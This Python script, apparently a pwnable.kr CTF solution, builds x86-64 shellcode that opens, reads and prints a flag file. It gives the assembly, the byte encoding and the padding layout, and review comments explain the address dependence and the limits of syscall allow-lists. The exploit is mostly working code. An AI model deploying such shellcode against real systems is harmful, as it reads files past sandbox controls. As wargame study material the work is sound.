- # Mak1ng_shelLcodE_i5_veRy_eaSy
- # echo -ne $(python x.py) > test
- #
- # Purpose: print, as text, a blob made of four parts in this order: the
- # machine code for the assembly listed in the docstring below, 100 zero
- # bytes, 96 NOP bytes (0x90) and a NUL-terminated file name.
- #
- # Every literal in this script is a raw string, so Python emits the four
- # characters "\xNN" and not the byte itself; the `echo -ne` in the command
- # above is what expands those escapes into real bytes in the file `test`.
- #
- # The code is position-dependent: it carries two absolute addresses
- # (0x41414158 and 0x4141408f), so it only does what the comments describe
- # when the blob sits at the address those constants were computed for.
- # NOTE(review): the load address and anything placed in front of this blob
- # are not shown here, so the address/offset match cannot be checked from
- # this page.
- #
- # Reviewer's note: the code issues only four syscalls (open, read, write,
- # exit). A syscall allow-list that still permits those four does not by
- # itself prevent a file from being read and copied to stdout; restricting
- # which paths are reachable is a separate control.
- """
- Linux x86-64 syscall convention: rax = syscall number, rdi/rsi/rdx = first
- three arguments, result in rax; the syscall instruction overwrites rcx and r11.
-
- mov rax,2            ; syscall 2 = open
- mov rdi,1094795608   ; 0x41414158, absolute address expected to hold the path
- mov rsi,0            ; flags 0 = O_RDONLY
- syscall              ; rax = fd, or a negative errno (never checked)
- mov rcx,rax          ; keep the fd; rcx is read again before the next syscall
- mov rax,0            ; syscall 0 = read
- mov rdi,rcx          ; fd returned by open
- mov rsi,1094795407   ; 0x4141408f, absolute address used as the buffer
- mov rdx,100          ; read at most 100 bytes
- syscall
- mov rax,1            ; syscall 1 = write
- mov rdi,1            ; fd 1 = stdout
- mov rsi,1094795407   ; same buffer address as the read above
- mov rdx,100          ; always 100 bytes, whatever read returned
- syscall
- mov rax,60           ; syscall 60 = exit
- mov rdi,2            ; exit status 2
- syscall
- nop
- nop
- nop
- nop
- """
- # https://defuse.ca/online-x86-assembler.htm#disassembly
- # Online assembler/disassembler, presumably the tool used to turn the
- # listing above into the bytes below. The two address immediates appear
- # little-endian as \x58\x41\x41\x41 and \x8F\x40\x41\x41.
- final_sc = r"\x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x58\x41\x41\x41\x48\xC7\xC6\x00\x00\x00\x00\x0F\x05\x48\x89\xC1\x48\xC7\xC0\x00\x00\x00\x00\x48\x89\xCF\x48\xC7\xC6\x8F\x40\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x0F\x05\x48\xC7\xC0\x3C\x00\x00\x00\x48\xC7\xC7\x02\x00\x00\x00\x0F\x05\x90\x90\x90\x90"
- # 100 zero bytes after escape expansion (400 characters of text at this point).
- # Presumably the scratch area that the read/write pair addresses; confirm
- # against the load address, which this page does not give.
- buf = r'\x00'*100
- # 96 bytes of 0x90 after expansion; the script does not say why this padding
- # is needed.
- nop = r'\x90'*96
- # File name followed by an explicit NUL terminator. It sits last in the blob,
- # so its address depends on the length of everything before it.
- name = r'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\x00'
- # Order matters: both absolute addresses in final_sc are tied to this layout,
- # so changing the length of any earlier part moves the parts that follow it.
- output = final_sc + buf + nop + name
- # Written as escape text; `echo -ne` turns it into bytes (see the top comment).
- print(output)